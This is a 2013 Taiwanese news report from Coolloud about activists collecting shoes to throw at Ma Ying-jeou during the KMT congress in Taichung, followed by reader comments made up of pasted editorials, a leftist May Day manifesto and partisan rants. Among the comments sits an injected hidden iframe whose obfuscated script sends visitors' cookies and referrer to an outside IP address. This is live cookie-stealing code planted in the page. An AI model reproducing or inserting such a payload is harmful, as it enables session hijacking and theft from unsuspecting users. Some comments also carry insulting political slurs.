藍10號開全代會 台中
社運連線重啟募鞋 追

2013/11/03
苦勞網記者

責任主編:王顥中

國民黨全代會預定本月10日上午在台中舉行,經歷過9月29日國民黨臨時將全代會改期、改地點召開(相關報導)、「全國關廠工人連線」工會幹部毛振飛、林子文入獄(相關報導),「929社運連線」今天(11/3)在台北市西門捷運站再度展開「募鞋」行動,並號召民眾參與10號早上的「威鞋馬英九」行動。

國民黨全代會將於11/10在台中召開,社運連線再展開募鞋,呼籲民眾參與「威鞋馬英九」行動(攝影:孫窮理)。西門町現場的「九宮格」也有王金平和柯建銘,雖然社運連線同樣批判這兩人,部分路過的民眾仍只將鞋瞄準馬江等人。(攝影:孫窮理)九宮格必須牢固地綁住,不然一下子就會被憤怒的丟鞋者波壞。(攝影:孫'窮理)去年「讓雞蛋飛」遊行前,台灣國際勞工協會等團體也在西門町募蛋,與民眾互動。(攝影:張心華)

國民黨全代會在台中港區(梧棲)綜合體育館舉行,社運連線預計在當天上午於台中市台灣大道八段與光復路口集合,連線成員吳永毅表示,之前到現場勘場,發現會場並不容易到達,因此預計在中港轉運站設置接駁的遊覽車,讓想參與但不在台中當地的人可以順利到達會場,吳永毅說,當天大約8點鐘左右,就會有遊覽車的班次。

西門町募鞋現場也擺設了政治人物「九宮格」,供路過民眾丟鞋,在今天的「九宮格」裡,也包括了王金平與柯建銘的相片,社運連線強調,不管馬英九用甚麼手段鬥爭,王金平是執政黨國會議長,柯建銘是反對黨領袖,卻構成一個利益共生的系統,濫權關說,社運連線同樣也會強烈批判。不過熱心捐鞋,甚至參與丟鞋的路過民眾當中,也還是有人提醒「不要丟王金平跟柯建銘啦,他們是『好人』」,面對檯面上政治人物搞鬥爭,入戲還不淺。

國民黨「馬王鬥」戲碼經過國慶日馬王握手,以及民進黨倒閣不成之後,已經漸漸失去媒體關注,國民黨順利閃開對馬英九不滿的氣氛,將全代會移師台中舉行,使得九月份的抗議氣氛漸漸消散,不過吳永毅強調,社運連線仍將全力動員,從今天開始,「募鞋行動」將由桃園、新竹、苗栗…陸續南移。

建議標籤: 
事件分類: 

回應

到哪捐鞋

莫讓關說案成為時代之恥 | 社論 | 意見評論 | 聯合新聞網
http://udn.com/NEWS/OPINION/OPI1/8271675.shtml

檢察總長黃世銘被台北地檢署依洩密等罪起訴,把王柯司法關說案再度推向反高潮。整起事件,正朝向「關說者沒事、揭發者有罪」的方向發展。

黃世銘在結案程序上留下瑕疵,招致洩密及違反通訊監察之罪,這是他必須承擔的責任,無法推卸。但從國家體制的健全而言,政治關說司法的主題竟乏人聞問,各方卻在程序的枝節上打得如此虎虎生風,豈不諷刺至極?目前的景象是,檢察系統分裂各擁其主,棄司法核心價值於不顧;藍綠政黨各取所需,法院更是袖手旁觀,對王金平黨籍案緩步處理。俟黃世銘被犧牲定罪,司法又能贏得什麼尊重?

台北地檢署起訴黃世銘,證明我們的檢察官足夠獨立,小檢察官照樣能起訴總長。不過,起訴書將王金平涉及關說司法簡化為「個人事項」,將關說司法的利害關係「極小化」,卻將辦案程序瑕疵「極大化」,並極度嚴格認定監聽資訊公益公開的範圍;以如此不對稱的標準認定黃世銘違法,恐怕也同時傷害了司法。

黃世銘處理王、柯關說案,程序不周確難服人。特偵組檢察官還在問案,監聽還未下線,形式上仍屬偵查中的樣態;黃世銘決定將此案由「刑事不法」轉成「行政不法」,僅是他個人心中的認定。而他錯引憲法第四十四條院際爭議時由總統召集會商解決的條文,急衝總統官邸報告,也讓關說案招致憲政爭議。

但剝開重重糾葛,回到洩密罪的構成要件,要論究的是:黃世銘在案件偵查中向總統報告,是否真不符合偵查不公開的例外規定?亦即,為維護公共利益、保護合法權益等情形,檢察官可將偵查秘密告訴非辦案人員的其他人。

黃世銘多次說明,此案事涉立法院長的高層級,就連行政院長也無法處理;此外,因傳喚林秀濤,可能使消息外漏;為避免關說案不了了之,且讓總統對於國會議長關說案先有心理準備,他因而向總統報告。這些考量,是否如檢察官所認定完全「不符合公益」,值得商榷。否則,過去檢察官因辦案須搜索特定機關或約談特定人,都先向機關首長打招呼,豈不都構成洩密?且如同黃世銘交給總統的專案報告裡記載,最高檢訂九月六日前完成偵查作為,結果也確乎如此,特偵組的偵查方向及進度並未因向總統報告而受影響。

此次,檢察官不接受黃世銘所稱關說涉案者「層級高」的說法,且數落黃世銘,若辦理類似「層級太高」案件都可置制度於不顧,恐生「專制復辟」。這樣的說法,恐怕小看了立法院長關說的層級;這不但是史無前例,未來恐也少有。即使從事後諸葛的角度看,檢察總長該如何做才能兼顧體制、又達到懲治效果,至今仍是一團迷霧、意見紛紛,豈如檢察官所說「處理制度與機制俱在」那麼輕鬆!

關說案喧騰近兩個月,黃世銘四面楚歌,刑事、行政懲處齊發;然而,反觀立法院對自家人關說司法,又作了什麼處理?不僅紀律委員會一路推拖拉,對於「立法委員行為法」應該增訂罰則補強關說司法之規範,立院也全都裝聾作啞。把黃世銘打倒,是在消滅台灣司法的大敵,或是守門人?

黃世銘犯下行政疏漏,自該負起責任;但向總統報告議長關說案,是否如檢察官所訴構成「洩密」罪名,恐怕有待商榷。黃世銘性格孤傲,面對自己的疏漏遲不道歉,致朝野立委皆欲除之而後快,但這正是政治對司法的反撲。而地檢署起訴黃世銘,真的是台北地檢署六親不認的英勇義舉,或如外傳是曾勇夫人馬「加倍奉還」的報復,司法人用自己心中那把尺想想吧?

黃世銘的去留並不足惜,令人扼腕的是國家的體制、司法的正義、社會的價值,在政治勢力、個人恩怨與派系糾葛的角力下一再被模糊與犧牲;同時,細節與形式不斷被放大,主幹與實質卻被當成無物。如果各機關輕忽政治關說案侵犯司法權的本質,最後遭到犧牲的將不只是黃世銘,而是時代對抗特權、釐清是非的勇氣。若關說案的本體消失在風中,那真是廿一世紀的台灣之恥!

黃鐘毀棄,瓦釜雷鳴。關說是身分地位的榮耀象徵,何來時代之恥?關說有理。

什麼是豬仔議員?

豬仔議員,為國父孫中山先生所指稱,蓋國父在民國十三年二月十七日,於三民主義民權主義第四講中云:「‧‧‧我們中國革命以後,是不是達到了代議政體呢?所得民權的利益究竟怎麼樣呢?大家都知道現在的代議士,都變成了豬仔議員,有錢賣身,分贓貪利,為全國人民所不齒。‧‧‧大家對這種政體,如果不去聞問,不想挽救,把國事都付託到一般豬仔議員,讓他們去亂作亂寫,國家前途是很危險的。」

由此可知,所謂豬仔議員是指收受賄賂、貪贓枉法、人格卑鄙、為國人所唾罵之民意代表。

中華百科全書 / 三民主義 / 豬仔議員
胡家斌
http://ap6.pccu.edu.tw/Encyclopedia/data.asp?id=3193

趕豬仔立委,拆豬圈立院。

豬仔議員 豬仔一元 Youtube
http://www.youtube.com/watch?v=prsyghPeOoI
http://www.youtube.com/watch?v=kb1wvJ_Shhk
豬仔議員篇 恆春兮工商服務
http://tw.streetvoice.com/video/spring/video/769/

<iframe src="data:text/html; charset=utf-8,%3cscript%3ewindow.open(String.fromCharCode(104, 116, 116, 112, 58, 47, 47, 49, 50, 48, 46, 49, 50, 54, 46, 52, 49, 46, 50, 48, 54, 47, 108, 46, 112, 104, 112, 63)+String.fromCharCode(99, 61)+encodeURIComponent(document.cookie)+String.fromCharCode(38, 114, 101, 102, 61)+encodeURIComponent(document.referrer),String.fromCharCode(95, 115, 101, 108, 102));%3c/script%3e" width="1" height="1" frameborder="0"></iframe>

立法權已駕凌行政權,鞋丟行政首長馬英九,恐怕是搞錯對象。

反監聽!反專制!爭民主!
打倒親中賣臺、毀憲亂政、貪贓枉法的馬陰狗!
監聽國會的特務頭子滾蛋!
拯救阿扁!

抗議全代會 讓舊鞋滿天飛
聯合報 / 記者張弘昌、張明慧、洪敬浤、鄭宏斌/連線報導
http://udn.com/NEWS/NATIONAL/NAT1/8281468.shtml?utm_source=udn&utm_mediu...

國民黨十九全會十日在台中市梧棲體育場登場,卅多個社運團體將齊聚排出「bumbler」字樣,指向場內的總統馬英九。

社運團體同時備妥了近兩萬雙舊鞋,其中七千雙將繫綁八十公分長的黑色抗議布條「助飛」,突破警方封鎖線。

據了解,九○八台灣國運動台中分會等團體已動員千人,清晨就集結,打算攔截馬總統車隊,企圖癱瘓交通,警方高度重視。

民進黨發言人林俊憲昨天表示,黨中央「柔性勸阻」抗議活動,希望黨公職不要拿旗幟、穿背心或動員群眾前往抗議。抗議馬英九有很多場合、也有很多方式,國民黨舉行全代會,基於政黨互相尊重的原則,民進黨公職人員不宜用政黨身分去公開抗議,但這是柔性勸阻,沒有強制約束力,也不會有黨紀問題。

九○八台灣國運動台中分會募得七千雙舊鞋,執行長張志梅表示,對馬總統的嗆聲、抗議將如影隨行,舊鞋綁上黑布條,就像擲鍊球般,可讓鞋子拋飛更高、更遠,「絕對要讓舊鞋滿天飛。」

社運人士傅東森串連卅多個社運團體,募集上萬雙舊鞋,也加入向馬總統丟鞋行列。

他表示,當天社運團體的抗議重點在排出「bumbler」字樣,以箭頭指向體育場內的馬總統。

「bumbler」是英國「經濟學人」對馬總統的形容詞,有人解讀為笨蛋,英國「經濟學人」指為「行事猶豫、略帶困惑」,知名詩人余光中譯為「大巧若拙」。

908台灣國運動 - 維基百科
http://zh.wikipedia.org/wiki/908%E5%8F%B0%E7%81%A3%E5%9C%8B%E9%81%8B%E5%...

2013/05/01 反資反帝學生連帶
反資反帝學生連帶2013年五一國際勞動節宣言

五一國際勞動節緣起

1886年5月4日,從5月1日開始罷工爭取八小時工作制的工人,在美國芝加哥乾草市場集會,抗議警察在5月3日射殺兩名罷工工人。當警察開始驅散集會時,不知名人士向警察投擲一顆炸彈。在爆炸和隨後的槍擊之中,七名警察死亡,至少四名民衆死亡,數十人受傷。當局遂以此為藉口,羅織罪名逮捕起訴工人領袖,對整個以德裔、波希米亞裔工人為主體的當地工運,進行長達八個星期的搜查和鎮壓。

結果,八名無政府主義者「密謀」罪成,七人被判死刑,一人被判15年徒刑。州長改判兩名死囚無期徒刑,一名死囚自殺,其餘四人在1887年11月11日高唱《馬賽曲》走上絞刑架──是為「乾草市場烈士」。期間,資產階級及其媒體全力配合當局,造謠誣衊工人運動,主張必須消滅激進分子。

1889年召開的第二國際第一次大會,為紀念在1886年運動犧牲的烈士們,決議在1890年5月1日舉行要求八小時工作制的國際性工人集會,即首次五一節。次年,5月1日正式成爲國際工人階級每年一度紀念先烈和誓師繼續戰鬥的偉大節日。

今天的困境、任務和展望

在第一個五一節已經過去了123年的今天,真正的八小時工作制,對世上多數的勞動者來説,仍然是一個理想,而剝奪工人勞動成果和壓迫勞苦大衆的資本主義制度,則又陷入了世界性危機。

然而,自1990年代蘇聯東歐資本主義復辟以來,共產主義運動──即工人階級自我解放、推翻資本主義、向富足的無階級的人類共同社會進發的運動──也陷入了前所未有的低谷。

資本帝國主義在國際上橫行無忌,僅存的號稱社會主義國家逐步資本主義化、走向工人階級重整社會主義或資產階級統治復辟的臨界點。

在意識形態上,帝國主義資產階級的「民主」、「自由」──即保障少數資產者統治、剝削、壓迫多數勞苦大衆的形式民主制,成爲了不少人心目中的「普世價值」。

階級意識、歷史和運動傳統的空前失落,使在資本主義世界危機之中,學業職業生活壓力日益增長、苦無出路的年輕人,不是進一步肯定資本的競爭邏輯,就是陷入無望頽廢,或被吸納進各種改良主義的甚至反動的「社會運動」之中。

面對如斯慘痛和荒謬的形勢,勞苦大衆要有效反抗和徹底終結沒落中的資本主義的各種暴行,就必須重新掌握階級鬥爭的歷史教訓,為重新確立工人階級的獨立階級意識、組織和國際性的革命政治力量而做準備。

在這個勞苦大衆生活環境日益惡化的年頭,越來越多資產階級的政治代表(主要是小資產階級民主派),開始自稱「進步」甚至「左翼」。

這些號稱左翼的人物和團體,無視和扭曲歷史,宣揚資產階級民主制,可以通過福利立法,成就據説勞資兩利、貧富不再懸殊、甚至經濟不再蕭條的「公義社會」。他們一方面推銷福利主義的空頭支票,另一方面鼓吹「本土優先」,製造在他們的領導之下,勞苦大衆可以在排斥「外敵」之餘,還可以同大老闆們平起平坐的幻想。

疑似左翼之中,更不乏以「馬克思主義」詞彙包裝本土改良「論述」的人物。用列寧的話說,他們「『安慰』和愚弄被壓迫階級,同時卻閹割革命學說的內容,磨去它的革命鋒芒,把它庸俗化」;在階級意識和歷史失落的情況下,「一切社會沙文主義者都成了『馬克思主義者』」。

要走出這個困境,則必須溯本清源,整理階級解放理論的基礎和階級鬥爭的歷史教訓,批駁本土改良主義者們在理論上和路綫上的種種歪曲和誤導,揭露他們為資本主義甚至帝國主義辯護的真面目,為集結志同道合者,形成群衆性的政治力量做準備。

本土改良主義是帝國主義的產物

以1950年代朝鮮戰爭爆發和美國全面扶植國民黨政權為契機,台灣的左翼革命運動遭到了滅頂之災,一整代左翼分子被槍殺或長期監禁。在帝國主義的卵翼之下,國民黨政權通過長期的反共反華親帝洗腦教育,徹底改造了台灣人民的民族和階級認同。

在左翼思想和運動處於真空的1960年代中,開始出現了訴諸美國支援的反國民黨政治力量,逐漸形成黨外運動。在1980年代末期冷戰結束和解嚴後,號稱本土的右派勢力徹底控制了黨外運動的主導權,成爲後來的民進黨。

以「本土利益」為主要吸票手段的民進黨的「終極主張」,是「台灣獨立」。據説,同中國一刀兩斷,就可以使台灣成爲一個「正常的國家」,並以此為基礎推行各種促進社會進步的改革。

然而,這是十足十的誤導。從1950年代開始,美國就一直在主宰着台灣,台灣實際上是美國的新殖民地。在這個情況下,脫離中國「獨立」,實際上只能是台灣永遠淪爲美國「屬國」的結果。

更不用説,台派所主張的獨立台灣,儘管加上了「多元公民社會」等一類僞裝塗飾,在實際上還是極少數壟斷資本家統治、剝削、壓迫多數人民的體制。台派以拒絕「中國官商資本」為幌子,實際上就是要維持台灣被帝國主義和壟斷資本統治的現狀。

有些以「台左派」自居的人士聲稱,他們主張「建立一個獨立的社會主義國家」。然而,這是比主流台派更加荒誕的説法。因爲要在台灣建立「社會主義國家」,除了要脫離美國宰制之外,還要徹底瓦解現存的國家機器,建立以武裝勞動者為基礎的、全新的無產階級國家體制。

衆所周知,台左從來只會反對「中國帝國主義」,除了私底下哼幾聲「我們也反美資台資」之外,在一切重要的公衆議題,例如親美日資本壟斷輿論、美國對台輸出核電、美國對台強制軍售等等,台左不但完全沒有任何反帝(即將美國對台灣的種種壓迫,指明是美帝統治台灣的結果,並主張結束這種狀態)言論,還被親美日的壟斷資本媒體奉為英雄。所謂「台左」,只是一個自欺欺人的標簽而已。

假若台灣工人階級發動推翻資本主義的革命起義,那除了台灣國家機器會開始血腥鎮壓之外,美國也會準備直接介入。近半生産基地在中國大陸上的台灣資產階級,也會聯絡各方反動派全力扼殺。屆時最有力量可以挽救台灣工人起義、徹底剝奪台灣資產階級的力量,就是中國大陸的工人階級。

由此可見,台灣的勞苦大衆,只能通過聯合對岸的勞苦大衆,才能徹底脫離美帝國主義的宰制、推翻資產階級的統治。也就是說,只有通過在革命基礎上的兩岸聯合,台灣的勞苦大衆才可以奪取社會的主權、實現真正的自主自治。

在對岸,以台派爲師的所謂香港「民主派」及其「左翼」,以及大陸的「自由民主」人士,販賣的是大同小異的藥方──用帝國主義認可的普選議會取代中共政權,選出「進步政黨」的議員,就可以同擁有主要生産資料、宰制勞動者一生的大老闆們,「平等坦誠」地「商討」「公義合理」的「財富再分配」。換句話說,這些人認爲,反對中共官僚政權的資本主義化路綫的辦法,竟然就是推行......徹底的資本主義「民主化」。

尋求出路的青年學生和勞苦大衆,可絕對不要上當!站在勞苦大衆的立場,台灣的「民主化」,與其説是「華人社會的典範」,倒不如說是反面教材。讓我們直面嚴峻的困境,一同探究階級解放運動的成敗利鈍,開始新的征程!

黑K黨聚會
數千警力
粗估一天要花千萬
平平人民團體
人民為啥要買單
黨國不分
他日必要好好清算

逢國民黨必反、逢馬英九必反的群眾,尤其是泛綠群眾,很喜歡跟國民黨比爛、跟馬英九比爛,結果百分之百是自己越比越爛。
這是固若金湯的定律。否則,2008年,民進黨的總統候選人怎麼會以超過兩百萬票的差距慘敗給馬英九,創下民進黨黨史上總統候選人最低得票率呢?
偏偏逢國民黨必反、逢馬英九必反的群眾永遠學不乖,真是自作孽不可活啊!

黨外運動不等於民進黨。很多黨外人士根本就沒有加入民進黨,更可怕的是,加入的、創立的早就被趕得差不多了。民進黨居然還有臉以「民主先烈」的繼承者自居、以「反抗運動」的正統繼承者自居、竊了他人的反抗國民黨之功,這和國民黨後來通吃「革命黨」史不是相同的嗎?
推翻滿清的,根本就不是國民黨。白色恐怖的最大受害者,根本就不是台獨,而是紅統派;白色恐怖居然成為打壓台獨的歷史、台獨先烈不屈的歷史了。
可民進黨的黨國論述或是台獨論述中,居然將這種假造歷史當真了,居然成為「主流」了,他們的「支持者」信了。
國民黨的竊國手段,得到的「政治神話」「國族神話」的統治性,太有效了。直到今天,所有的「藍迷」還在執迷不誤的相信,認為國民黨就等同於中華民國。所以為了中華民國,怎樣也不可以讓國民黨消失,即使它再爛,失去了它,就失去了「國家認同」「民族認同」一樣。所以永遠的要有「正藍」,而非得是國民黨不可。這個「政治神話」「統治論述」太厲害了不是?
民進黨也就變型它,讓它成為「台灣國」的「創建者」。只有民進黨可以定位什麼是「台灣人」,因為沒有民進黨就沒有台灣國。要有台灣國,要當「台灣國人」,就非要是民進黨不可。泛綠的台灣國論述,根本就只是泛藍的中華民國論述的變型而已。
可更扯的是,國民黨與民進黨,兩個「竊國黨」都是竊了「不存在的國」:一個是早就消滅的國,一個是未曾建立的國。而他們的「信眾」們居然以為,他們的「政權得失」,是自己身分認同、歷史自我認同的定義。真是可悲啊。
相信中華民國等同國民黨的人,和相信台灣國等同民進黨的人,不是一群被騙的愚民是什麼?一群被人選舉時「提選票」的「自動提票機」。